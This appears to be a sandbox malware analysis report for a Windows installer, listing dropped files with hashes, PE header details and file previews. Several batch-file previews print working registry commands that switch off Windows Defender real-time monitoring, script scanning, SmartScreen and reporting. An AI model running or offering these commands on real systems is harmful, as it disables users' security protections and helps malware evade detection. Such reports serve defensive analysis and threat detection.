Preview:	@echo off & title f & color 17..cd %~dp0..set lofddfcaftiofgdfn=Windows Defender.. reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f.. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "EnableWebContentEvaluation" /t reg_DWORD /d 0 /f.. reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\AppHost" /v "PreventOverride" /t reg_DWORD /d 0 /f.. reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_EdgeSmartScreenOff" /t REG_DWORD /d 0 /f.. reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AppAndBrowser_StoreAppsSmartScreenOff" /t reg_DWORD /d 0 /f.. reg add "HKCU\Software\Microsoft\Windows Security Health\State" /v "AccountProtection_MicrosoftAccount_Disconnected" /t REG_DWORD /d 1 /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%" /v "RandomizeScheduleTaskTimes" /t reg_DWORD /d "0" /f..

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\3-2.bat

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	434
Entropy (8bit):	5.031892107507258
Encrypted:	false
SSDEEP:	6:hnIbwjsH1gCTBSiA7CPm/O8zzCFrmVoCTPm/O8zzCFC1EXiHVBVgTPm/O8zzCeQe:VwX4m8z0rm5am8z0COXePVgam8zQyL
MD5:	B873B53A111AD0BC879BB2A9F13F6E42
SHA1:	6FEC8422AA8B713198D208E6EF368AD315A0E875
SHA-256:	CA6FFE62A8B50B04365897DD86FC99B510BB56B1C2B227A162675915C4027ABC
SHA-512:	57CFEC0C2ED7F7E311BD5D284E1744767B7C4C72A8F5E077A5039BE22377894889AD476C8C8A706E15590A613A83C7986476CE18014F16A6B9C88284A146B7FD
Malicious:	false
Preview:	@echo off & title f & color 17..cd %~dp0..set lofddfcaftiofgdfn=Windows Defender.... reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%" /v "PUAProtection" /t reg_DWORD /d "0" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%" /v "DisableAntiSpyware" /t reg_DWORD /d 1 /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Exclusions" /v "DisableAutoExclusions" /t reg_DWORD /d "1" /f..

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\3-3.bat

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	248
Entropy (8bit):	4.8560729637056195
Encrypted:	false
SSDEEP:	6:hnIbwjsH1gCTBSiA71Y5JV4yTPm/O8zzCGQLFDFHVol:VwXZ9am8zDQphC
MD5:	5EB0F1FC0625E457CFF176DBE24C80A8
SHA1:	176B93EF2263A41780C2A0B5F103FB2BB8ADB258
SHA-256:	0F8FC2848315C45384F4A882F66C00B6136A825220FF69F97BC722CE9DE796D0
SHA-512:	FA687C99E67E5EBD0A5EEF7D38A95E098C9B5B6A4274CDC5437D579F8D8D6A365803F044510F57D701FF30ADF26B11C6E97A5A7293E719ECE260A22C778CEDA2
Malicious:	false
Preview:	@echo off & title f & color 17..cd %~dp0..set lofddfcaftiofgdfn=Windows Defender..set lofineddfcaftiofgdfn=MpEngine.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\%lofineddfcaftiofgdfn%" /v "MpEnablePus" /t reg_DWORD /d "0" /f..

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\3-4.bat

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	779
Entropy (8bit):	5.033788172625281
Encrypted:	false
SSDEEP:	24:yxdUJJMKH5adUJJlVKH5adVMadRMadTFL:+nW5wIW5wVMwRMwTFL
MD5:	502141F08CF3A1A3A6B86664D5B3016B
SHA1:	DD02560635C812FBF8712AAE19186F6CEA46755C
SHA-256:	3FEE5FAEA4C993E24DD146C38AE26E4CF84718799699BEF0561DCF35D9442503
SHA-512:	0198ABA11D8C13672DC7CA38B971A563822CD2D6958248784B7C2112D91035276A614C1ADBA47993B292ADDE96A29C48B2ED6D5FEE583935C33E9A7D3B0A1863
Malicious:	false
Preview:	@echo off & title f & color 17..cd %~dp0..set lofddfcaftiofgdfn=Windows Defender..reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Quarantine" /v "LocalSettingOverridePurgeItemsAfterDelay" /t reg_DWORD /d "0" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Real-Time Protection" /v "DisableBehaviorMonitoring" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Real-Time Protection" /v "DisableIOAVProtection" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Real-Time Protection" /v "DisableOnAccessProtection" /t reg_DWORD /d "1" /f..

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\3-5.bat

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	DOS batch file, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1156
Entropy (8bit):	5.018890749779181
Encrypted:	false
SSDEEP:	24:yxdUJJMKH5adOMadmMaddMadzTMad0lNxad01UJadFOy:+nW5wOMwmMwdMwXMw0Txw0mJwIy
MD5:	6C2F2CECCABD30E915BDA62099D9BD60
SHA1:	8CF0635E3C7FC92A3EA446FB334DFD8C8A3D51E5
SHA-256:	840309DF7FF7FE80446D42CBF49D5CD8850017FAD04767225357BA5517E664D8
SHA-512:	20DC6A15A6A575153462D97C5BE5DCF7F7B40850C7B30AFBF26B5E7050FCA2487EC8273ED5CE732C28E140E93437B2E078DFC50C53A44289454165A9A6978A60
Malicious:	false
Preview:	@echo off & title f & color 17..cd %~dp0..set lofddfcaftiofgdfn=Windows Defender..reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Quarantine" /v "PurgeItemsAfterDelay" /t reg_DWORD /d "0" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Real-Time Protection" /v "DisableRoutinelyTakingAction" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Real-Time Protection" /v "DisableRealtimeMonitoring" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Real-Time Protection" /v "DisableScriptScanning" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Remediation" /v "Scan_ScheduleDay" /t reg_DWORD /d "8" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%lofddfcaftiofgdfn%\Remediation" /v "Scan_Schedule

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\4.bat

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	6659
Entropy (8bit):	5.257330446656906
Encrypted:	false
SSDEEP:	192:+NU51xvjKi66SBMUKQJ/mRof4aGeB4Cqp0G4f:Yn
MD5:	B2CEFC347ED58D497AC1D124BFE73E89
SHA1:	7828251E46246618894AA5937E8093EB160ACF2B
SHA-256:	3B238C78C325ADB1F5BC129151CED81B16B4F9557E8ADEB5E6067A2A09192868
SHA-512:	EBBBCFB3B5CD6F227240E892718C255263C674A1CAFBA6BE454D16EC24015BF018BD2FBEC89E97B42BE448957849F8A5BC2D821DEF123A512AD31B8F744A3582
Malicious:	false
Preview:	@echo off & title f & color 17.. cd %~dp0..set location=Windows Defender.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%location%\Reporting" /v "CriticalFailureTimeOut" /t reg_DWORD /d 0 /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%location%\Reporting" /v "NonCriticalTimeOut" /t reg_DWORD /d 0 /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%location%\Reporting" /v "DisableGenericRePorts" /t reg_DWORD /d 1 /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%location%\Reporting" /v "DisableEnhancedNotifications" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%location%\Scan" /v "AvgCPULoadFactor" /t reg_DWORD /d "10" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%location%\Scan" /v "DisableArchiveScanning" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%location%\Scan" /v "DisableCatchupFullScan" /t reg_DWORD /d "1" /f.. reg add "HKLM\SOFTWARE\Policies\Microsoft\%location%\Scan" /v "DisableCatchupQuickScan" /t reg_DWORD /

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\BasicCalculator1.exe

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	15360
Entropy (8bit):	4.989618164583392
Encrypted:	false
SSDEEP:	384:8lqTZjX7pr3Fi0h1MFiINg3/nonmGfB2MuK:8lqc56Qmm
MD5:	2924ECDB306FFD3C3C226F4F2B0F9A7E
SHA1:	FC17904D30B924D8337C65C42E8F69F1FBC80843
SHA-256:	6EB6224DFE5AF519B3B78D76BE107D68A93C012999D790AE733BED6020891AEE
SHA-512:	DDF804359F0F0A1E62DCC69E5942BC0F9E3DB3434D1A7A6AD4292BC3DE8A455E6989A1DCD82BBA2225BDA4F5BE0D788C05B04C08CBD50F69217FEE747292D68D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...}?eg.........."...0..2..........JQ... ...`....@.. ....................................`..................................P..O....`...............................O............................................... ............... ..H............text...P1... ...2.................. ..`.rsrc........`.......4..............@..@.reloc...............:..............@..B................,Q......H........5..............PN..p.............................................~....}.....~....}.....~....}.....(.....(......0..C........{....r...po......{....r...p(....}.....{....%o.....{....(....o......0..C........{....r...po......{....r...p(....}.....{....%o.....{....(....o......0..C........{....r...po......{....r...p(....}.....{....%o.....{....(....o......0..C........{....r...po......{....r...p(....}.....{....%o.....{....(....o....*..0..C........{....r...po......{....r...p

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\PowerRun64.exe

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	945944
Entropy (8bit):	6.654096172451499
Encrypted:	false
SSDEEP:	24576:X2DW/xbMX2YIbxQsu3/PNLoQ+HyS2I4jRk:X2EgXoQsW/PNUQWnX4jRk
MD5:	EFE5769E37BA37CF4607CB9918639932
SHA1:	F24CA204AF2237A714E8B41D54043DA7BBE5393B
SHA-256:	5F9DFD9557CF3CA96A4C7F190FC598C10F8871B1313112C9AEA45DC8443017A2
SHA-512:	33794A567C3E16582DA3C2AC8253B3E61DF19C255985277C5A63A84A673AC64899E34E3B1EBB79E027F13D66A0B8800884CDD4D646C7A0ABE7967B6316639CF1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 21%
Joe Sandbox View:	Filename: Auu2j0pT0B.exe, Detection: malicious, Browse Filename: 4hIPvzV6a2.exe, Detection: malicious, Browse Filename: 3Dut8dFCwD.exe, Detection: malicious, Browse Filename: Ms63nDrOBa.exe, Detection: malicious, Browse Filename: Ptmhbplhxb.exe, Detection: malicious, Browse Filename: P196hUN2fw.exe, Detection: malicious, Browse Filename: e4.exe, Detection: malicious, Browse Filename: 2dOeahdsto.exe, Detection: malicious, Browse Filename: bQQHP9ciRL.exe, Detection: malicious, Browse Filename: DllHost.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i.@............yGI......p\.}....pJ......p[.............._.....................pP......ZJ......ZK.......H......pN.....Rich............................PE..d...(..K..........#......\...*......\|..........@.....................................N........@...............@.................................T................j...Q.. ............................................................p...............................text....Z.......\.................. ..`.rdata...V...p...X...`..............@..@.data............v..................@....pdata...j.......l..................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SelfDel.dll

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, UPX compressed
Category:	dropped
Size (bytes):	5120
Entropy (8bit):	5.021119508727912
Encrypted:	false
SSDEEP:	96:NdekHUj5z13cPopei+Ml9PNDFbS7xg+TScrQ5:NdeuU9xcPopr+M9FbSS+TSE
MD5:	E5786E8703D651BC8BD4BFECF46D3844
SHA1:	FEE5AA4B325DEECBF69CCB6EADD89BD5AE59723F
SHA-256:	D115BCE0A787B4F895E700EFE943695C8F1087782807D91D831F6015B0F98774
SHA-512:	D14AD43A01DB19428CD8CCD2FE101750860933409B5BE2EB85A3E400EFCD37B1B6425CE84E87A7FE46ECABC7B91C4B450259E624C178B86E194BA7DA97957BA3
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.................................t........................................Rich....................PE..L...rb.R...........!.............`..@v...p................................................@.........................`...D...X...........X...........................................................................................................UPX0.....`..............................UPX1.........p......................@....rsrc...............................@..............................................................................................................................................................................................................................................................................................................................................................................................................3.91.UPX!....

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\SetACL64.exe

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	616312
Entropy (8bit):	6.302197712270286
Encrypted:	false
SSDEEP:	12288:3G2NBTh+l8gAqAbdsuEa3nZGSebY7o937bfJ9Ud:3xNBTYlaLdaynZGBc7orbJ9Ud
MD5:	1FB64FF73938F4A04E97E5E7BF3D618C
SHA1:	AA0F7DB484D0C580533DEC0E9964A59588C3632B
SHA-256:	4EFC87B7E585FCBE4EAED656D3DBADAEC88BECA7F92CA7F0089583B428A6B221
SHA-512:	DA6007847FFE724BD0B0ABE000B0DD5596E2146F4C52C8FE541A2BF5F5F2F5893DCCD53EF315206F46A9285DDBD766010B226873038CCAC7981192D8C9937ECE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...............................}.........@..........................................................g...........Rich....................PE..d.....`..........".................x$.........@..........................................`.............................................................x.... ..P@...J..x...............p.......................(.......8...............8............................text............................... ..`.rdata... ......."..................@..@.data....8..........................@....pdata..P@... ...B..................@..@_RDATA.......p.......$..............@..@.rsrc...x............&..............@..@.reloc...............<..............@..B................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\WebView.exe

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	10240
Entropy (8bit):	5.222288638134981
Encrypted:	false
SSDEEP:	192:o+eyiPRetnkY5phamuQ3TWrU5ehzopSOOz/lgKf7We:NezReFkY5pJr3TWrU5dez/tf7W
MD5:	419DF0C5A4CE2BB14D1B7BB55ABC0D17
SHA1:	7FEED8574CDEA9A68FB345818F5B4414C1F18A49
SHA-256:	7105976CCD68E838865B6A40A1B9615172BDD9B062A65BF0F24B236E7CD8844A
SHA-512:	5E2CFDC6DD345962B537AC08817AC0426F28F51669961E50902D73015E356153D6ADCB8C1307D7974158F7DE5162C3EB74021202B5D5243F98E641B95C12E1CF
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 4%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....:J..........."...0..............=... ...@....@.. ....................................`..................................=..O....@.......................`.......<..8............................................ ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......&..............@..B.................=......H........$..`...........x;..p.............................................(.....~....-.r...p.....(....o....s.........~.....~............~......(....Vs....(....t...........(.......0...........(.....(......(......(....,...+.....&...,...(.....#........(......{....(.....,...(......( ....(!....s"...}.....{....o#...r7..p........s$...o%...&.s&...%('...o(...%.o)...%rA..po...%.{....o+...}............s$...(,............$.. ...6.{.....o).....(-...,..(....-...(/.....(/...*R

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\dotNetFx40_Full_setup.exe

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	889416
Entropy (8bit):	7.856409051573377
Encrypted:	false
SSDEEP:	24576:+tW4x8xAxCdUcyezFSjaBHFaNlsqK5/oh6iZf1LUXw/vxNI:d4x8xqCGexm8FCspg0iZf1LUXD
MD5:	53406E9988306CBD4537677C5336ABA4
SHA1:	06BECADB92A5FCCA2529C0B93687C2A0C6D0D610
SHA-256:	FA1AFFF978325F8818CE3A559D67A58297D9154674DE7FD8EB03656D93104425
SHA-512:	4F89DA81B5A3800AA16FF33CC4A42DBB17D4C698A5E2983B88C32738DECB57E3088A1DA444AD0EC0D745C3C6B6B8B9B86D3F19909142F9E51F513748C0274A99
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............}...}...}...,...}......}.......}...//..}.../...}.../...}.......}...}...}...,+..}...,/..}...,...}...,...}...,...}..Rich.}..........................PE..L......J.........."..........^...................@..........................@......a8....@...... ..................@.......D........................z..h.......l....................................V..@............................................text.............................. ..`.data....7..........................@....boxld01............................@..@.rsrc...............................@..@.reloc...(.......*..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\dotNetFx45_Full_setup.exe

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1005568
Entropy (8bit):	7.880783246239561
Encrypted:	false
SSDEEP:	24576:3idS2cRQNb9dUcyezFSja7zEwA2BH6SEUVGDKX68zuQm6wwr5mAPepC:SQ2cRQh9GexmCxBxVV56CmWQax
MD5:	9E8253F0A993E53B4809DBD74B335227
SHA1:	F6BA6F03C65C3996A258F58324A917463B2D6FF4
SHA-256:	E434828818F81E6E1F5955E84CAEC08662BD154A80B24A71A2EDA530D8B2F66A
SHA-512:	404D67D59FCD767E65D86395B38D1A531465CEE5BB3C5CF3D1205975FF76D27D477FE8CC3842B8134F17B61292D8E2FFBA71134FE50A36AFD60B189B027F5AF0
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6.]`r.33r.33r.33ih.3s.33U3^3q.33...3s.33...3Y.33...3`.33...3..33r.23..33...3g.33l..3s.33ih.37.33ih.3s.33ih.3s.33ih.3s.33Richr.33................PE..L..."x^O.........."..........^....................@..........................@......x.....@...... ..........................4............................>..........................................8Y..@............................................text...Z........................... ..`.data....7..........................@....boxld01............................@..@.rsrc...............................@..@.reloc..j(.......*..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	5632
Entropy (8bit):	4.519702607207955
Encrypted:	false
SSDEEP:	48:6vorbN0GyvvgDgKg66mTmQrkY92r48mq8aNM+/IJ8NKkQIzSX6lc1tPA6Ct+uluU:/N0G+d8IhTKy1Wt4PQVzNt
MD5:	71923BB5EDAFF27984A1A49095554A5F
SHA1:	58C8886F2E6F6C1CAE2EF606FEA0C6708326F0AD
SHA-256:	8678DA6C35691E8396814683E235C84887763E359CE197C4851467011BE9F647
SHA-512:	D57CBAED7D338BF93101DA4B82F487AD22994DDFA2A312DC058A495D67E4BFF0ABC50AEB8304A7034B96381E3FC49C96DC0861701E91582AE2FB3DB59BEF4139
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 3%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...o............."...0..............+... ...@....@.. ....................................`.................................v+..O....@.......................`.........8............................................ ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................+......H........!...............................................................0..........s.......o....o......o....&....s......o.....o....o.......,..o.....r...p.(....(.....<.rC..p.o....(....(.....$..r]..p..o....(....(.......,..o......4....$..7..........MS..........Mk...................0..................s.......o....o....%o....&o....o....o.......(.....Io....%-.&r...p(.....4o....%-.&r...p(......o....%-.&r...p(.......,..o.....*.4......,:..........,O..........,d..........ky........(.

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nggwslounqxvwf.exe.config

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	257
Entropy (8bit):	4.97028593092204
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VJdfEyFRSuAKbyXI9VWmtClMyuQIT:TMHdG3VOcrS98yX2yuxT
MD5:	441F5C5C7933C16068A03D99BC8837C4
SHA1:	76D1DE63216C2C1218CF47A5D768A18952A1DCB3
SHA-256:	F1CAC503709C2ACD9AB0A7D0E48A4ABF2777D16052FEE68830260A78359EC72F
SHA-512:	5B8FA02B827993541841A2FD07A50E5D2C5A7F5BA35E0B282ED3A453E3F919D63F1C9432D922CC364027351C57D2B78F99F5F1469C86B581CC53ACB76FDFC366
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" sku=".NETFramework,Version=v4.5"/>.. </startup>.. <system.net>.. <defaultProxy useDefaultCredentials="true" />.. </system.net>..</configuration>

C:\Users\user\AppData\Local\Temp\nsiFE19.tmp\nsExec.dll

Download File

Process:	C:\Users\user\Desktop\KYagm8gq5S.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	7168
Entropy (8bit):	5.295306975422517
Encrypted:	false
SSDEEP:	96:JgzdzBzMDhOZZDbXf5GsWvSv1ckne94SDbYkvML1HT1fUNQaSGYuHIDQ:JDQHDb2vSuOc41ZfUNQZGdHA
MD5:	11092C1D3FBB449A60695C44F9F3D183
SHA1:	B89D614755F2E943DF4D510D87A7FC1A3BCF5A33
SHA-256:	2CD3A2D4053954DB1196E2526545C36DFC138C6DE9B81F6264632F3132843C77
SHA-512:	C182E0A1F0044B67B4B9FB66CEF9C4955629F6811D98BBFFA99225B03C43C33B1E85CACABB39F2C45EAD81CD85E98B201D5F9DA4EE0038423B1AD947270C134A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L....C.f...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.9948403300862685
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	KYagm8gq5S.exe
File size:	2'666'282 bytes
MD5:	59586c94ee121385d362a60382217b4e
SHA1:	816f6785f139eabe477a15023ccc7cff17790763
SHA256:	f27e3367788f7758120c63b9a725e7cb07998ce664b0571a56c8d0b8e05c1ec4
SHA512:	6ca972a5a66b68529f6b601a445438b64978093707ffe66b22eb5a911b96f449e94119c8d9d4845f1235e9a104356b4c98207ed252d21309f000b785da9cd3c0
SSDEEP:	49152:8bi9YK3c/XThdxGmLYxgxcrNbuK0+tWOchELCoZz943+YaJNFtM+5wL3AP9/:8u9YK3c/XThvtlGxU+0OsOCoR9YCr2ZY
TLSH:	B9C5337BB481D577F13711340C6D7BF62CA1EB438FA80239B9B13C994D9B6968B27242
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!.@.@...@...@../O...@...@..O@../O...@...c...@..+F...@..Rich.@..........................PE..L....C.f.................h....:....

File Icon


Icon Hash:	0771ccf8d84d2907

Static PE Info

General

Entrypoint:	0x40352f
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x660843EA [Sat Mar 30 16:55:06 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f4639a0b3116c2cfc71144b88a929cfd

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F45E49071AAh
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F45E4907178h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [007A8318h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x84fc	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x3e9000	0x3ec0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x66d1	0x6800	1cb1571d2754df0a2b7df66b1b8d9089	False	0.6727388822115384	data	6.4708065613184305	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1358	0x1400	f0b500ff912dda10f31f36da3efc8a1e	False	0.44296875	data	5.102094016108248	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x39e378	0x600	92e7d2d711bd61815cb4cc2d30d795b1	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
